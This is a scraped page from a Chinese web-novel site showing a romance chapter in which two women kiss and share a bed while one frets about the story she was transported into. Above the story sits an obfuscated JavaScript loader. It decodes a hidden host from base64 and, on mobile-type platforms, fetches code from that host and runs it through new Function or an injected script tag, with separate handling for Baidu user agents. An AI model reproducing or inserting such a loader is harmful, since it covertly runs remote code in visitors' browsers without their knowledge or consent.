98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(65(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

屋子里静悄悄。

鲸鱼。良久,未婚妻说。

她的脸搁在她肩头,声音听起来像梦呓。

嗯?

秦萌说要回来。

孟璟听了这句话,没动,半晌轻轻松开了她,撤开一拳的距离,但是两手依然扶着未婚妻的肩,即使是在暗夜里,她脸上轻薄的怒意也显而易见,两个人静静相对了数分钟,她才问所以呢?跟我们有什么关系?

宋若仰脸看着她,眼睛黝黑乌润。

噢,我知道,你又要跑路了?孟璟声音带上一点笑意。

宋若没则声。

孟璟抬手刮刮她鼻梁,好好,就算她要回来,在你说的那本,抬手打个引号,书里面,她是个人物。可在这个真实的世界里,我爱的是你,你就不能勇敢点么?你就不能把我看好么?

宋若安静得出奇。

孟璟又不忍心了,轻轻蹙眉。流理台很凉,未婚妻坐在上边很不妥。这么想着,就打横将她抱起来,打算送她回房间去。可是她的手才一碰到宋若,她的双臂也搭上了自己的肩。

孟璟有点异样的感觉。这个天,未婚妻穿着冬季的睡衣,把自己裹得像朵一样,抱在怀里软软的,她身上淡淡的香气也在鼻尖萦绕。

宋若若眼睛明亮湿润犹如山间迷路的小鹿,这一瞬间她是脆弱的,仿佛被不知名的情绪蛊惑了,挺起上身蹭上来,在孟璟嘴唇上轻轻印下一吻,是柔软而温暖的一触。她好像是为了试试感觉。接着退下去品了品,彷如吃了什么东西在回味似的,随即未婚妻的两只手绕上来搂住了自己的脖子,再度吻了上来。

小药瓶子的吻技真是差得可以。上次雪里那个吻她主导的,还不觉得哪里不对。现在发现,她就像个婴孩一样,只是无措地吮着自己的唇珠,还浑身微微发抖。

孟璟单手托住未婚妻的背心,任凭她乱七八糟地发挥,却感到发自内心的愉快。

第78章

孟璟故作被动,也并不是吝啬,只是她想看看未婚妻完全掌握主动权的时候,会走到哪一步。令她震惊的是,宋若若跟玩儿似的,亲了几下,就歇气了,撤下去,低着头一言不发。这怎么行?孟璟用嘴唇去寻找她的,试图找回场子,未婚妻却轻轻躲了一躲,微微喘息着。

今天确实很累了。

来日方长。

那睡觉吧。好吗?孟璟提议。

未婚妻好像仍然沉浸在刚刚那个并不怎么圆满的吻里。

孟璟也不再问了,自作主张,将她抱回房间去。

体重太轻,像抱着羽毛。

床头那盏小台灯和孟家宅子里的是同款。

都是充电式,即使停电,也能用上一两个小时。

打开来,灯光黄黯黯的,熏得房间暖起来。

孟璟看一眼坐在床上的未婚妻,顿时吃了一惊。

未婚妻的双眼盛满潋滟的泪光,我刚刚

孟璟默了会儿,叹息我知道。顿一顿,高考之前不谈恋爱嘛。高中生还是努力学习,刚刚只是吻戏训练,没问题呀,老婆随便亲。不过呢吻技确实还要再改进一下,我慢慢教你好啦。

宋若慢慢镇定了下来。

孟璟在床前蹲下,仰着脸,老婆,今晚我在这睡可以吗?

小药瓶一瞬不瞬看着她。

你看,我都让小苏把车开走了。

现在外面那么黑你知道我怕黑的啊。

宋若点了点头,你去卸妆。

还是撒娇管用。

孟璟起身去浴室,本来想裸睡,但害怕让未婚妻当成变态扔出去,从未婚妻的衣柜里借了一件睡衣。

等她回来,小未婚妻闭着眼睛,看样子睡着了,替她留着那盏橘色小灯。她轻轻地爬上床。小床软乎乎的,像是童话故事里豌豆公主睡的那张。躺下了,悄摸摸挪过去挨着她,握住了她的手。接着翻个身,将脸埋在枕边人的肩窝。

宋若并没有睡着,身边像安了个小火炉。手被孟璟握着,她的鲸鱼头还蹭过来,温润的呼吸全喷在她颈窝,耳朵也因此变得滚烫。

这要是还能睡着那就奇了怪了。

她陷入华丽丽的失眠。

其实隔壁的客房,床和被褥都现成,铺开来就可以睡。

但是,她没有力气叫鲸鱼过去。

鲸鱼追逐的速度甚至赶超了她奔逃的速度,已经在前面等着她。

可这算什么呢。

她的本意,离开孟家,是要通过物理距离,来达到和抹香鲸疏远的目的。

可刚刚她都对鲸鱼上嘴了。还一起睡。比在家时更过分了不是吗。

这不成了把她诱拐出来?

孟爷爷知道以后会怎么想?

会不会以为她是不想住在家里,嫌别人妨碍了她和鲸鱼谈恋爱了?

就好像社会上那些结了婚以后坚决不跟公公婆婆住在一起的新婚夫妇一样。

今晚的失态没别的,也就是秦萌发了个微信消息而已,节目进行到吃饼干那个环节之前,中场休息,她看了一眼手机。

在大家的命运尘埃落定以前,小娇妻就像她心底的定时炸弹。

什么时候爆炸并不确定,有时候甚至忘了这件事,可那滴答滴答计时的声音却没消失过。

时至今日,她发现,她比原主要怂得多得多。

原主虽然鲁莽,至少忠于自己的感觉,爱就爱了,恨就恨了,从不瞒人,也不瞻前顾后。

我们曾相爱,想到就心酸。

这是她上辈子很喜欢的一句歌词。

得到又失去,固然很心酸。

但是这么可爱这么温柔这么善解人意的孟璟,哪怕以后注定属于别人。

近在咫尺的时候却没有牵过她的手,难道不心酸?

东方微微发白。

她微微转过身,将大鲸鱼搂了搂,真的好温暖。

假如有一天又穿越了,回到了本来的世界,或是穿去了别的书

孟璟会不会很悲伤?

到时候她该怎么办?

说不定的。也许原主临终许愿,要让这只大鲸鱼也受点苦,所以她来了。

这种假设让她瑟瑟发抖,半晌抬起上身来,找到鲸鱼的嘴唇,轻轻吻了吻。

睡梦里的孟璟梦见下雨了,皱了皱眉。

冗长的思绪最是磨人,第二天宋若被手机信息提示吵醒。

倪俊提醒她参加首映式。

她从房间出来。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间